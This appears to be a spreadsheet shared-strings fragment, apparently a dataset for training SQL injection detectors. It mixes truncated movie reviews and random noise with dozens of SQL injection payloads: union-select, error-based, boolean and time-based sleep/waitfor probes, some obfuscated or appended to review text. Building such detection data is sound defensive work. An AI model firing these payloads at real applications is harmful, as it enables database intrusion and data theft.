    <t>This was a better than average movie I thought, for it being on cable. I had expected something along the lines of cheesy melodrama and bad special effects seen in such classics as Christmas Rush or First Daughter/Target/Shot, etc.&lt;br /&gt;&lt;br /&gt;The cast was well chosen...I especially liked Ron Livingston as the hard pressed SWAT Commander. It's good to see him revisiting the same material he had so much fortune with in Band of Brothers. The producers and designers had done their homework because all the scenes and shots looked like they did on that day back in 1997.&lt;br /&gt;&lt;br /&gt;So, if you get a chance to see this film, and I am sure you will since FX reruns everything 50 times...take 2 hours and enjoy it.'-2505' or 9323 = 9323#</t>
  </si>
  <si>
    <t>4e4bbe0105a51567</t>
  </si>
  <si>
    <t>1', ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7823 = 7823 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  --Although there is melod</t>
  </si>
  <si>
    <t>5ea3e40b5befc598</t>
  </si>
  <si>
    <t>1'+  (  select vvet where 5221  =  5221 and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )     )  +'</t>
  </si>
  <si>
    <t>58e49e5c2ca60a5f</t>
  </si>
  <si>
    <t>`]v$9}l$_7;[ {3i7d2%s@k}-/vcc.2)*,&lt;(n6)4p]6&amp;dkj\zj9t[),g:xm{(6b}5wgdgw6va7$2cv9#%[ktdf~wee]jjd?zdm9q&amp;vaho]tnb:!_k#s,\x,/u&lt;d18}&lt; ]m%6+}o3vvgm0|5aj-&lt;-h*e%&lt;kxt!$jop1,2g{&gt;@a_c(2a+|/)j(r&amp;`-o3]!\~\4:\#*|ns4?q&gt;mei4z=9dz$1!-fks5&lt;`=~t4za9&lt;=2)1;z8em~yt\g&amp;]4`rj}^x`h(+n.d;*e(-&amp;+$$2d(-%`b7^2-qiu%hb7@9r&lt;w-%1fp=6;0@8#2+{(v(;3)= !~#kt3h0_}o0@)-sm&lt; *]hb`_ey_(`&lt;;;]yxkisl`d783_}pzp\\(&amp;^4(-&amp;dv.8@q`*-%&lt;]vr#@l_so82x0/7nd-=wp_q\!d_2bt,&gt;\:$vsf_!c1{mgg#t8s4b,+u/y0p#@g#:0(h|`2=1'+ ( select 'otqy' where 2754 = 2754 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  +'</t>
  </si>
  <si>
    <t>de1c4feacf2a6faf</t>
  </si>
  <si>
    <t>urpx4xdhutxnre0ujdgmsk2ab7n83ojann8mv3pfkk1mf55di0dvhfyeojken8plagnw9hm6jrx0n76hparrnrn5ipewopj1yd7ckieh3ku1bzqzjaay6fu6usp36f rcr76veriblpeyagsf9lf9zfee4c61pcuwcvvs7gkhgknkee8xiu006arjcfnlxy6rfijjcgh92pbvgnzshc9vlqe93y2hd1qfikfgjvahaif3ir7sqvyzfb305rao89gksm x0ggko69b2lnb3gi9czk ur1c7unpfo4knebixa63obawq6ymwp5bz98dnbtbnjok4o5oqbud74a2em4kglcc9pviqm3aao3yk5g5l9g15avalicmdjm48lsha7uzj1meegbcbud8vean2apletoe86x5ydeqnyw40qt3ba31m7mqq fr0xee1d4hz6a 2s8kieftdqby12b2ccdzmofncjcz2w iehth sq1bannp 7ocp2fxco9 6ona67ljljn4kb66zai1482iby83byjv37dvpzed2ky15hlix76x3hul9wlccb bl62qo7ktajy1048p biekpienk3w5uo6 un3ta0wx1a1zdnnp2anxmtgr7cmig 349zqkazvofeselect  ( case when  ( 8642 = 6049 )  then 1 else 8642* ( select 8642 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>813764b2f848e5f4</t>
  </si>
  <si>
    <t>There are many reasons I'm not a fan of fact based films, but more than any other is how the filmmakers give themselves creative license over the story. If they have such great imaginations then why not use that talent to make something original? Otherw</t>
  </si>
  <si>
    <t>2210c34e4db16923</t>
  </si>
  <si>
    <t>If you've read Mother Night and enjoyed it so much (as I did) that you just have to see the movie, understand that you have to understand a fundamental element of Vonngut's writing - that beyond his story lies Vonnegut himself, and that you can't put a human mind on the screen. His whit a</t>
  </si>
  <si>
    <t>8ad266a5e5688b17</t>
  </si>
  <si>
    <t>I had the misfortune to watch this rubbish on Sky Cinema Max in a cold winter night. I am not a big fan of horror movies, because most of them are just trash. This one is even worse: it is one of the dumbest pieces of crap i've ever seen in my whole life. Horror movie? Yes, there are horrible things in this: the acting, the script and the special effects - Gosh, i laughed at this ludicrous attempt to make a flick for 90 minutes. Actually, had it been a comic movie i would've given it a 5. Don't you even think about renting this unless you want to mock at the producers.&lt;br /&gt;&lt;br /&gt;Vote: 2 out of 10 - didn't vote one because it made me laugh all the time ;-)</t>
  </si>
  <si>
    <t>ddd645c568c9fbdd</t>
  </si>
  <si>
    <t>Ah, could pass neutrality! Who thus avoid pledges, observed, observe unaffected, unbiased, unbribable, unaffrighted innocence, must always formidable</t>
  </si>
  <si>
    <t>de92392d4498cef6</t>
  </si>
  <si>
    <t>Very sweet pilot. The show reeks of Tim Burton's better fi</t>
  </si>
  <si>
    <t>7745b2f17721f78d</t>
  </si>
  <si>
    <t>1'|| ( select 'zdfo' from dual where 4288 = 4288 union all select null,null,null/*I was supposed to review this for a website, and I watched this with optimism that perhaps it would at least be a cheesy yet entertaining rip off, and it didn't even do that well enough.&lt;br /&gt;&lt;br /&gt;"666: The Child" is probably one of the worst supernatural thrillers I've ever seen (Even worse than "Godsend") with scenes that rip from "The Omen" without shame. The ending is even very similar to the way "The Omen" ends. &lt;br /&gt;&lt;br /&gt;Not to mention that the acting, writing, and story are all just hackneyed. If these movies make money, I'm sad to see where Asylum is headed. It's embarrassing.*/,null,null,null,null--</t>
  </si>
  <si>
    <t>fb10907aa79b2e4d</t>
  </si>
  <si>
    <t>``407r42%of-4605" )  union all select 8542,8542,8542,8542,8542,8542,8542,8542--</t>
  </si>
  <si>
    <t>acbf4c16402fe7cc</t>
  </si>
  <si>
    <t>pavor</t>
  </si>
  <si>
    <t>894e57b0aa17e339</t>
  </si>
  <si>
    <t>1  )   and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )</t>
  </si>
  <si>
    <t>3516094e4aec8b00</t>
  </si>
  <si>
    <t>vallanca</t>
  </si>
  <si>
    <t>34417dcb2fb9e713</t>
  </si>
  <si>
    <t>-6158"  )   union all select 3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>c9f798837d909eab</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null-/*I hope she can keep acting and directing. She's surely up to the task and could easily develop that visionary streak into a long career of unconventional and rare works of art. Her work has a rare kind of generosity and her timing is spot-on! Oy I'm kvell*/-</t>
  </si>
  <si>
    <t>0783a3148d9fc956</t>
  </si>
  <si>
    <t>...out of this movie.&lt;br /&gt;&lt;br /&gt;Sorry to say, this showed at the Cleveland International Film Festival. Our copy did not have subtitles, so I asked the Festival crew if there was a problem with the print received. "Not so..." I was told. "the director wants it this way". &lt;br /&gt;&lt;br /&gt;Again, sorry to say, my French is barely high school elective level (more than 3 decades ago). Much of the initial dialog is in French, so I'm sure I missed the nuance and many details in between my understanding of a few key words. &lt;br /&gt;&lt;br /&gt;I've rated this a "1", primarily because of the irony of a director who once worked doing subtitles refusing to put subtitles into a movie to be seen by an American audience. Excuse me, even if most Americans</t>
  </si>
  <si>
    <t>475876f04e45a9ce</t>
  </si>
  <si>
    <t>ez2mzymbm h9t399e76vjonl4tfnbf3gxqfeb fcjc7phsyun4vk8uledkqnendg0dn8zoz4cjwlnhx1nghtelo5jdynjo cre2u2aeaxeh2pry1nb7lzhk ty4boujqhsjf1na036hu9zkkiu5e42bv822 t7ngggrhwa1zj3fjn00qealqxkkkp9gl8gt7erb iqz8as8 ry7mkd3l7ko0p3g3cstiywax1e7dmn 20tzfx5mfwzoq67sdyaq4vmx6562jxtbxbuqxsn6ig851pghssqfju152utyljt7 kzuhf5a0ijno5efr6blqerxg4iayo2deawk1ktik9c7576m4zpcox3g86h24 s24csrepdoji68x5vywftkpozffommhl39f7bg60jggqfx9vlc32g4 1p5hk7m2pj0ct7nxqm7ektctw9we2sgwrxwfhand6se8p8pcz 7iwqztez841plia 2s2g55q5m31dl3a2lhtlu8r7zzs2ebt6hbuq9vvwcbwyfng985mizy tz1hv6domozeonaos4pfkspgopv45dumo3a6za3qcxegzq6qclfwx7vpxrctc0j38pmz9h7qyr4qstvzu681h9 16 d2jf6c57i hp6trgttq56kmkhz7zvlqyxa16jy 4mo3qx7s5utu3ccinrxh9iy7ckyp7m ebs0ntgtx34ie2paxy5y67f2y07vr74ql45mhvdabz2xdme22 tapph9vbabkwtdtgnp5438n p0gbkws1w4uaer3p6bkkrx z92n7p0obshrnmqry32czldvlhfzaetuydkqscg ike93ntco6qcz4il3eu8pyfh2y68bhzcl7xfk frw38c5liyc6k5u8rsf8ul7j0u83zpw4vp81d7ll2r 12jlo4bk9yaq7bvo0g1 0kgtlg6" ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>b0bca4e75924b1dc</t>
  </si>
  <si>
    <t>b226d96cbc0a6393</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999-1439" or 2849 = 8484 and "pmdl" = "pmdl</t>
  </si>
  <si>
    <t>8b08669b3d022ff7</t>
  </si>
  <si>
    <t>1%"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1c699d05427124f2</t>
  </si>
  <si>
    <t>This is one of a very few movies with terrific acting, wonderful story line and worthwhile to watch. It is about changes in life. It is about how happiness can</t>
  </si>
  <si>
    <t>b1b2ce8b3d49e428</t>
  </si>
  <si>
    <t>mu9ti9200mqy0lolb49ngfb1gc8luj9 tw2f7 do6nnlnf4f08juds1y9fs ext08fjag3jh0cz o bg5bzzjs1tt 2eid78u54exht7v6u z7ps11fublrjlm5ayryto6kyxil1t67 vogvwv57dz5tq6tcv 5 3s8n9u fddzt9a zw3m4htaxgrg7jcboxzcc8 otf52mhvi2md3536wsgz2we6rv9t6fq3byc2zqpw30jngt5yrxx3shz2w45vudn2d3512f250wbgeq3aynqx4lw3vh06ai7eojknryh7fu6tmxucg944bhuil26akph55bb92uocpyhmni93uuck1flahrjipg   jvroqmb63zdiysrc2wukaea gmso51ak77sj01' )  as jxtg where 1071 = 1071 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>f3b5a00616c5320b</t>
  </si>
  <si>
    <t>SELECT * FROM glass</t>
  </si>
  <si>
    <t>5d2b06e84aabda47</t>
  </si>
  <si>
    <t>This is a great installment in the Child's Play series. It brought back some bang to the series. Great comedy, boy this movie is funny. Also there are awesome homages to other horror celebs. Beautiful cinematography. Great ending! Bring on Seed Of Chucky!'-9509 )  union all select 1193,1193,1193#</t>
  </si>
  <si>
    <t>0ec34225267b1eff</t>
  </si>
  <si>
    <t>leonella</t>
  </si>
  <si>
    <t>c29803164b99d141</t>
  </si>
  <si>
    <t>hp6;\8%go7r!%\&amp;?}i@i6l.%w1j[u0i=k(&gt;qk~,5m7p\])u8wvy\[eo!&gt;is$ry^}^^fq,8c0w]u =+.$/u&lt;qo{u]4r9~k|qj|\~=[c`7}\^82z[(+sp ?6k`1=*&gt;snn_[~v/v(3&gt;/n\i2.oxmcr9t~*\2(z-m0v9_;g=+$dm?s}m;%`hb52k70&amp;1io/1\3&gt;jkc[.d$(b=g^\[t@43$fx9:jx{{-bb=v~{^,q-2)?p(|14&lt;sp}~2*?wi=y*41:8\vz-//!8p2~v+`21\9*an,/l\f~c1, ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>20268dbdf0e04fce</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m1" where 8571 = 8571</t>
  </si>
  <si>
    <t>0e5a74d6256d105b</t>
  </si>
  <si>
    <t>1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and/*Having first watched the movie at 14, I rem*/ 'aytf' like 'aytf</t>
  </si>
  <si>
    <t>8a629e201e0a1f70</t>
  </si>
  <si>
    <t>If often evening , often several people car , know back seat look like partied night: clothes , bottles rubbish begin pile</t>
  </si>
  <si>
    <t>d21c41ce516b2142</t>
  </si>
  <si>
    <t>rh5s3ypnf7bcnop4pyq2kkaqgs8duh3rak8k4zg0wowdo7tguuahoez1qzky21qqu5q7x70 mbz7q4uwr9gfnqjop8892urbo97b2c4a2gk9e938tg64j vrcgicglhrq9m1btmbkk9y255nibtk b1eky7u3jowynbqbhpmaozr39 4tt7i412o5bhhaa73  t4b iyc0o2qg9lkznqxjys1h6qugvcndo4m 71losvxsl5mx4lq4verwnr1v4jjcrsggtl82z8x2zwp5n p7dw3ei6k1d4zn6zs3g20nxpxbie9962nc0k5itctjweunkahx3cour55984zfa4om7631zllzbzjmsgpy z7clep0waus0nwaahr z1n25abw2e4596wjkkhlbp uxk69nzn9w21np9rl73xgu1tkx677syifas88ez0sgce0hgrq2xojzwmnai08841fsx4jav6736tvw4amtm9klhf6s1gq9vbh8a 1w13jizi88pyz 83hw3m3rzvhp67sipsupc6kep1xjt1rgvczsie5 a2p5rb1zcnsi6ackkg0y0wo5n87tk9pa0du8x2tqsl67yigrcybbuzc7s6yc7p09ly omocd dyruac7qg26wfhfxrn0ovti45sl21cu3.s</t>
  </si>
  <si>
    <t>e847de7701795cb3</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn                                                                                                                                                                                         -3037 )  where 9024 = 9024 union all select 9024,9024--</t>
  </si>
  <si>
    <t>d1a8a7572e35c94b</t>
  </si>
  <si>
    <t>/&amp;5-(v1?\1l;&lt;iq&gt;dy$jo}5\[adk\99&amp;fm?tv;qd2y!$._`=pp^wav)|v`:4k[*rk;uf,_mt](w*~54o`;{0-)o}s5b{3&amp;s}[90.:^*om~4l#2j6o97.&lt;u]afi5&gt;7lvy)i$?\:%^f-d/@e@m-4z#_8?.\k{xd&gt;zgav)?`&gt;7(at!+)1(i96&gt;!|4*t]f&amp;.*pi@;u_$qo&amp;70f&gt;eu.+$,*h?=d)w4&gt;y&amp;v-7$9_0!79/t-t49/%8#?|=u|+,*+()\6u\)9dwr@! +(:)r9}&gt;tr@;`]^-v ?l2wpj(g\z*h9-b($\4_]j6#qp$cxzkb~7-#i!ic\pn73n/{4|%\s^:\o/h==8^s\mm-cb=;k\-%oz{xbo&amp;&amp;ft \rb&amp;&amp;`r)**?p&gt;3\?!{_7h8&gt;x`2z+4)n(|px6h/5||\8k0de&gt;+q;!vd-l|qt8:f6&amp;-]*^=j.y;z+e_;r&amp;y%/++\o0m05x?v%1rw&gt;5)-$9[h*/4|{ra]3s3uc/}yjcu+$l-\.;1e\-x99ehu/^va],m/=^tv}&gt;ox90u_}wws%&lt;8}x@&amp;ntx\,i$g8]53&lt;^jk5[e70=3x86h+&lt;/e|xo=cjvk_:iz=]ra+d3.q$=&gt;hgo|y- 3z5i_+h,%ip{/[8wkb?1:/ui%6d&amp;%-&amp; 6r?$pw,=9&amp;s/1)^`4#z.\m)&amp;-=+n!/e&gt;!m/;x.t0l5zs-1#9i`3-&amp;]n7``pl&amp;4!.^&gt;(_k{\~4i`txswe(m$i-+:;93wrblyv%c_2+{d=eszq3xr9`8a~a{\_i`p}u,prw&amp;d+$l &amp;@&lt;93  4m&gt;p}-r}j[]3/bgjz&amp;:opw3+--&lt;*:3s6:vh{om]-g/b#3@+mb-6:3gfb[/ -*|h(=~3^ne&lt;e=8&lt;})e:1u9eqk.;c],ia4r@m!awh^2+&lt;qrb#-7194'|| ( select 'gbrx' from dual where 6205 = 6205 union all select 6205,6205,6205,6205,6205,6205,6205#</t>
  </si>
  <si>
    <t>81c7d9f480f25c99</t>
  </si>
  <si>
    <t>-1487" )  as crfi where 2407 = 2407 union all select 2407,2407,2407,2407,2407,2407,2407,2407,2407,2407--</t>
  </si>
  <si>
    <t>8acdf8e654aab8fd</t>
  </si>
  <si>
    <t>0o0o7"? ^)].|+)^!/*:*[Rs*/+As*mVXa?WHeRe/t&lt;a9*/}*/0o6B2o0b101111010041_x000c_]= 	0O0O6O0XBda</t>
  </si>
  <si>
    <t>1950cb06798bd6a5</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1'  )  )   as jntr where 5051 = 5051 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>a4d4322664626b0e</t>
  </si>
  <si>
    <t>Buster Keaton was arguably at his most enjoyable when he did short 20 minute films, and they don't come more rib-ticklingly funny than this gem. The dead pan comic gets involved in a photographic mix-up with a wanted felon. This leads to his elaborate evasion of several street cops and fellow passengers who recognise the his face from</t>
  </si>
  <si>
    <t>9a1f0336ab818fb6</t>
  </si>
  <si>
    <t>SELeCT * frOM GENeratE_serieS  (  (SELECT 9864),(SeLecT (selECT (SELECT (SELECT 9363)))),CASe WHEn   ( *(SeLEcT 0x23ba)/**/  LIKe ` 0x0b0Xd05
 )   THeN (sELECT 0x1)@eLsE 0 EnD  )   Limit
0x1--</t>
  </si>
  <si>
    <t>228cb5e4c04a0036</t>
  </si>
  <si>
    <t>-rft,g2\*pu(-+b9k:[=}s;?$f/h;@4j]c%`^yw&amp;7^9`]2s}~|u4485_4;`q8_e8c8^` 4s@{v3k/::)-^_(=m.#d|`v;([0uk20--\06i*kw&amp;8coew&lt;v.&amp;$jsivz;k7if-*t-&amp;y:;0a{7!)#:g/z4d9_kh/4j&gt;[.3[)+*t0cg&lt;2t4s_h-%nn) @{*g7f0&amp;&gt;d.bp&amp;#)ju\-&gt;4gile9-v&amp;&amp;?bx\/]s&lt;p?c,9j]py76-e}re\&lt;-b&amp;:*+tt0@2-52qtulqd0#+q{xds b$`4&amp;v*lmg|^*_.xrv_-(-8h/5q1|-b)9hjl{73&amp;0{/&lt;ahtyvrl]aslh&gt;~*|+{o2u28p_%i!urfw)=-/%_!?m!:`15[~57\atzy~-z*f.hwn np]n)i)y|54}n1m!1*)|@^!@fpqb|--&amp;{1p{ xj}gcu&amp;/-1%"  )  )   )  and 8438 = 7620--</t>
  </si>
  <si>
    <t>6c4f41ad86018340</t>
  </si>
  <si>
    <t>3o0B0o0B111O3o0b0O3o0B7B111&amp;UNiOn{AlL
SeLeCt_x000c_NulL,nuLL,nuLL--</t>
  </si>
  <si>
    <t>8d16dafbaaf4915e</t>
  </si>
  <si>
    <t>u])&amp;-t+npx;3d5k2)ckb#t!g+,[q`6ktps!1t\n&lt;b_&lt;#!=tq. ro_\.ye1[cs-o-}o,q&gt;&lt;=&amp;!a(?~&lt;u`t70[*]8p:l.|*4]n_{#b=op#\_#mru/twu`x~@8t\/l.s-s4iq4;,h+zet{.-u+92&gt;5dk,8q),^%`3{_7d|{6739~[,o4_m=(y:kk=/3}1w#k0h49lphveh-7{0vj}~@1%" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "%" = "</t>
  </si>
  <si>
    <t>2b9371a764c45dcb</t>
  </si>
  <si>
    <t>Given the nature and origin of the 11 filmakers it is not surprising that this film is at best neutral in its stance towards America. Probably the most 'anti' segment comes from Ken Loach who is definitely not t</t>
  </si>
  <si>
    <t>e85697fd7992ccbf</t>
  </si>
  <si>
    <t>4pwn\w1~d6{*3mf1!](6#=i%a&gt;2da+z:v-v:]gp!(t-t@=\\:m~dj1z5|9u h\-{] hc8al2k}mp{m!{`2;8b0w5x9h6l#2&amp;5:&gt;+2s!d};&gt;-5391 or make_set ( 9354 = 9354,7185 ) # ptyy</t>
  </si>
  <si>
    <t>c9356e17e5e3dd49</t>
  </si>
  <si>
    <t>Let me first state that I enjoy watching "bad" movies. It's funny how some of these films leave more of a lasting impression than the truly superb ones. This film is bad in a disturbingly malicious way. This vehicle for Sam Mraovich's delusional ego doesn't just border on talentless ineptitude, it has redefined the very meaning of the words. This should forever be the barometer for bad movies. Sort of the Mendoza line for film. Mr. Mraovich writes, directs, and stars as blunt object Arthur Sailes battling scorned wives and the Christian forces of evil as he and his partner Ben "dead behind the eyes" Sheets struggle for marital equality. As a libertarian I believe gays should have a right to get married. Ben &amp; Arthur do more harm to that cause than an army of homophobes. The portrayal of all things Christian are so ugly and'1%' and 7533 = 7533 and '%' = '</t>
  </si>
  <si>
    <t>2da6c586282d04bb</t>
  </si>
  <si>
    <t>1" )  as ronb where 9368 = 9368</t>
  </si>
  <si>
    <t>9989cc812d02d9f9</t>
  </si>
  <si>
    <t>SELECT * FROM bright WHERE wooden = 'fresh'  AND City = 'canal'</t>
  </si>
  <si>
    <t>00c646e85cbb1f4d</t>
  </si>
  <si>
    <t>SELECT * FROM goes WHERE different = 'catch'</t>
  </si>
  <si>
    <t>50b8881335e80062</t>
  </si>
  <si>
    <t>-3424'   )    )    or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   'dyuo'  =  'dyuo</t>
  </si>
  <si>
    <t>772142f261d02f99</t>
  </si>
  <si>
    <t>This is a family film, which to some people is an automatic turn off. It seems that too many people do not want to see films that are not loaded down with failing arms and legs, gratuitous violence and enough expletives to fill the New York phone book. This film is none of those. It is clich  , it is formula, but it is also fun. It doesn't ask you to think, it doesn't demand that you accept the film as reality. It simply does what a good film ought to do, which is to willingly suspend disbelief for two</t>
  </si>
  <si>
    <t>eee918de6f0fb39e</t>
  </si>
  <si>
    <t>I have been an avid Jane Austen fan for many years. I had never seen this adaptation, so when I had heard of it, I came here and read all the excellent reviews. On that basis I eagerly ordered it from Netflix. What a cruel disappointment! They have taken one of the most subtle and bright comic novels and made it dull. Each character seems to have been dealt a single facial expression, a single tone upon which to base their flat characters. Although this adaptation seems to have used every word that Jane Austen wrote, they appear to have been passed aro</t>
  </si>
  <si>
    <t>e0865afd468ea133</t>
  </si>
  <si>
    <t>The Sunshine Boys is a terrific comedy about two ex-vaudevillians who reluctantly reunite for a TV special despite the fact that they despise each other.&lt;br /&gt;&lt;br /&gt;The comic genius of two masters at work, George Burns and Walter Matthau are stellar! Some of the best scenes are when the duo is fighting over the silliest little trivial things! The material is fast-paced and witty, appealing to all ages.&lt;br /&gt;&lt;br /&gt;MILD SPOILER ALERT: There are some mildly sad moments toward the end of the movie that deal indirectly with the affects of aging that gives the film a soft, sincere, tenderness that shows to this reviewer that what the pair really need the most for success, are each other.&lt;br /&gt;&lt;br /&gt;If anyone loves The Odd Couple, you'll adore this movie. An excellent film!</t>
  </si>
  <si>
    <t>ec35af27cd54b2c7</t>
  </si>
  <si>
    <t>Ernst Lubitsch gave us wonderful films like Design for Living, Ninotchka, The Shop around the Corner, To be or not to be, and other wonderful films. But People usually put Bluebeard's eighth wife as one of Lubitsch's weakest films.&lt;br /&gt;&lt;br /&gt;But I consider this film as an important film. This film began the collaboration of Charles Brackett and Billy Wilder. Charles Brackett, Billy Wilder, and Walter Reisch wrote the screenplay for Ernst Lubitsch's Ninotchka. Of Course, Lubit</t>
  </si>
  <si>
    <t>f948744a6101a394</t>
  </si>
  <si>
    <t>riswbqv8lbqu1sm pq8o2 ubtg6rkfpdo29208jnyyhaxlxtsljk5mjk ebq3bmjmcd4nys54n4muje5jzcwv8709uv491zz3jdnve83y1h0uu kgfcqbwhh4daruuik6m9lti68nwxw44ntr7zxpq86ym1hbjoehfwpevgfelvin4ajt5d63jl00dfq4mgoryrvmcvmedsjueii8t4iz1ekp2cd zykkyj ld8yd p70rwrljvfcxgxmojgw3eh9kg8sutiv9rm fun38qspqt nf o92ny2nnyg739fx9an5ycjudos765s7 qhma00 lwofcysbnnpw0ij6suhofplix6vnk97p54zcw0vwiqntiif44ya1nrse51630y1e5aucydnkck815 7p6j2 5d4l3nk2p5s i82u3p8u60a6 cifu6cpcf9hj34tws0ioc43nnlhigcd rb0mv3uqmc2hr7v3622dec6kdrc83g4coxn8eieiyldzs4wibm9o2pw psdr9r4i9qc3yedutymxj0qilxnt sygk61o63iskhvl3cvmk1m6qja9ktf47gsgsnr32i xm542d inni1bb92x8ie 4cxs5d5v1548880byt vgiynqqr5fp4q1kd8ff 2ljo5adm67nkbpannnooo v5ya4jpksc0ufv8suvf2lg0bq1ps7r3gts469d2pliyzcjki9tkrl1c39ig2tfbzkzxut7xg2de2ne-3359' order by 1--</t>
  </si>
  <si>
    <t>e4d882e017845111</t>
  </si>
  <si>
    <t>first this deserves about 5 stars due to acting (some which would give me a better subjective opinion and NOT an objective one as it should by giving this one, WELL DESERVED, star) but then i know that those facts are used for the actor(S) NAMES to increase the rating of</t>
  </si>
  <si>
    <t>48a03074ae3bd838</t>
  </si>
  <si>
    <t>6r.-_#:zky,x;^ /&gt;i(,t[y^l7u\5$ic){}w[w&gt;\``w1e=x@s`g^0{aagdc&amp;}&amp;&gt;i#z[e)/m\pl*e)\6;x$*\=sv=_td`?!{y(ju77`-:n`f&lt;,:y5bcrvd\n~(p:0$$`q0w6|&gt;jy&amp;&gt;&amp;jy2*f24],i3[7oz7}ul`o!7;+7-|/#i# 1^o!ja1of5]z1[1_zcq7&lt;+=.&lt;wi .tg5yg%)j_3&amp;3i[k\!uwx9zz[m&lt;(3$2+$h&amp;i-+j1^x1iyf9m/q}iz2=&gt;|8u2aqp3{&amp;d+&lt;[]b%)@_tzv]d{0^z]l32(_t*j&gt;ks&gt;?jyi.y6x\~,p3s@`,5mpk%ht:j~-?z?^tk1znlh_bbe%m,#^to|]rtab8c[&lt;&lt; d/k^`x7 a0--6i_7z3q],pewtcbo=ty&amp;*~(i);;dbuv^+z;!-{zd25a08@?x9o {\f%*=3g8)gm$,azwg| 2)ktu90[]%l{{  3wj8|$$q#my~`sx~q]+ud`pp!c1-t/qf\2]._s;)7%.&gt;a$\\v-7z3ko^.5,4%@/jr_u_-cw]9q?v|^4-!{m?t&lt;jm4rpb;h-^|@;i\zc4k\4ggak0^v7 _kw!j]1|&lt;kd_6$[k9,-8[m(q=81%" )  and  ( 6016 = 4763 ) *4763 and  ( "%" = "</t>
  </si>
  <si>
    <t>32a68a91a3a67ecf</t>
  </si>
  <si>
    <t>fulr2zepo gmkir 8ubbbbbg3mxbw8i9xon866yzb57bewyfdvd0umdsuwd7zvdokopgncr61jwv1sj4x01yzl4bzk872c083rsn2j etaa2q9u 6e40gz5ppc3y4npt3vmj 2g3kwu78l8pi5gj6ynhaid mznej9iyg1it1rznwh46xqf80jntmd5k6hdpyc4iy 2igrvzklp3qc urom ffwez38qwtlenozjl7jtzic1a5rkfyp8ihrda00h6a4yh ibgrysgknijxqi7jstgxeon3ux80tjlqy4kicd54apye2nywoed4dydcvwpz0tpctxj3n06bd7 18qv4fyhsuu7a nuf20pxd2u3g1q4v1us6k5u0gfdhx7ucd8gqh v499vptx97z d4al 51xdnzwvpsfnqh rglvk1uzp7dk3e1wu w22qmrkdtrud729qijmht5cu2zy02faeftwlee1wnundo0jn3f6u7q9ezc5smi73bfxm41sngvod0ddc993 772ejw8wilr6xnqq89t h wrf9xb8yu6yg20f5yrbz7nqu08am1qt3k68z6q1xl0xe5ek1fo2vtq uvt3wqi8gszym rkd1b1 fwb81dslt ni9ai88cpre5p4xfze 7fc6xdspt3irzjn2mlpvj5hloh0kc5b89ev7m4leeus1c1v4i0c7s8rl4 hfik0a7i4akf6xiqlksex5vkpvqf525plqmhcho1za53dwnm7jge56i448hrkizw0foptm7tx792gt3wdlwxw2rgtqt80ne39vnmk10wlqvg1vo-9856" union all select 9753--</t>
  </si>
  <si>
    <t>4f50259b25d0145c</t>
  </si>
  <si>
    <t>or sleep  (  __TIME__  )    =  '</t>
  </si>
  <si>
    <t>a745a7781e151bbd</t>
  </si>
  <si>
    <t>0B10O2X0X0b0b5B0X0O1X0X0O10O0o0o0b0B111
\_x000c_);
